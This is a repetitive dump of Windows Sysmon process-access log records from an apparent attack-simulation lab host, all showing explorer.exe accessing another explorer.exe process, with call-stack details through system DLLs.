16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.655{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 